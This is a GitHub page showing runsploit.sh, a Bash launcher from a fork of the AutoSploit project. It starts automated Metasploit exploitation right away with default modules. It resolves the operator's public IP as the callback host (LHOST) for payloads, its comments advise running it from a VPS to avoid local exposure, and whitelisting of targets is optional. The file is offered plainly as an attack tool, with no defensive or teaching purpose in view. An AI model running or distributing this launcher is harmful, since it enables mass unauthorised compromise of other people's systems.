forked from NullArray/AutoSploit
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathrunsploit.sh
More file actions
executable file
·29 lines (22 loc) · 761 Bytes
/
runsploit.sh
File metadata and controls
executable file
·29 lines (22 loc) · 761 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/bin/bash
#
# this script runs autosploit with default configs and default modules
# protip be on a VPS when you run this because it's gonna start an attack
# right away
#
if [[ $# -lt 1 ]]; then
echo "Syntax:"
echo -e "\t./runsploit.sh PORT [WHITELIST]"
exit 1
fi
echo -e "[!] Make sure you are not on your localhost while running this script, press enter to continue";
read
WHITELIST=$2
LPORT=$1
LHOST=`dig +short @resolver1.opendns.com myip.opendns.com`
TIMESTAMP=`date +%s`
if [[ ! $WHITELIST ]]; then
python autosploit.py -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/default_modules.json
else
python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/default_modules.json
fi;